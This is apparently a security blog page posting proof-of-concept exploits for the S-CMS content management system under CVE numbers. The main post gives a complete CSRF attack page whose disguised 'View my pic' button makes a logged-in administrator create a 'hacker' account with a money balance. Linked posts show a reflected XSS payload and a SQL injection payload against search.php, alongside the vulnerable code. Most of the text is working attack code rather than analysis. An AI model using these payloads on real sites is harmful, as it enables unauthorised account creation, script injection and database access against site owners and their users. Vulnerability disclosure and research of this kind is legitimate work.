Skip to main content

The POC of S-CMS(CSRF)-CVE-2018-19332

Download page:
https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip


CSRF Exp:
<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html" charset="utf-8" />
</head>
<body>
<center><h1>fake request</center>
<div>
    <form action="http://127.0.0.1/S-CMS/admin/ajax.php?type=member&action=add&lang=0" name="form" method="post" role="form">
    <input type="hidden" name="M_login" value="hacker">
    <input type="hidden" name="M_pwd" value="hacker">
    <input type="hidden" name="M_money" value="10000">
    <input type="hidden" name="M_fen" value="0">
    <input type="hidden" name="M_name" value="1">
    <input type="hidden" name="M_email" value="g@gmail.com">
    <input type="hidden" name="M_qq" value="132">
    <input type="hidden" name="M_add" value="x">
    <input type="hidden" name="M_mobile" value="11111111111">
    <input type="hidden" name="M_code" value="xxxx">
   
    <input type="submit" value="View my pic">
   
    </form>
</body>
</html>




poc:
There are four users before administrator clicked the link
four users(before)


The fake page

When administrator logged in and access the fake page then click the button,a request was sent.

the adding user request

A new user was created after the request.

five users exist(after)

Comments

Popular posts from this blog

The POC of S-CMS(Xss) -CVE-2018-19145

Download page:
https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip

location: S-CMS/search.php   line144

Vulnerable code:  <input type="text" name="keyword" class="form-control" placeholder="<?php echo lang("输入关键词/l/Input your Keywords")?>" value="<?php echo $keyword?>">

Exp: "><script>(1)</script>






The POC of S-CMS(sql-injection)-CVE-2018-19331

Download page:
https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip

location: S-CMS/search.php line 155

Vulnerable code:  $sql="select * from SL_text where(T_title like '%".$keyword."%' or T_content like '%".$keyword."%' ) order by T_id desc";

Exp:
%' AND 1=1 AND '%'='




%' AND 1=2 AND '%'='



Attacker can add sql statement in the between of both "and" to query the database.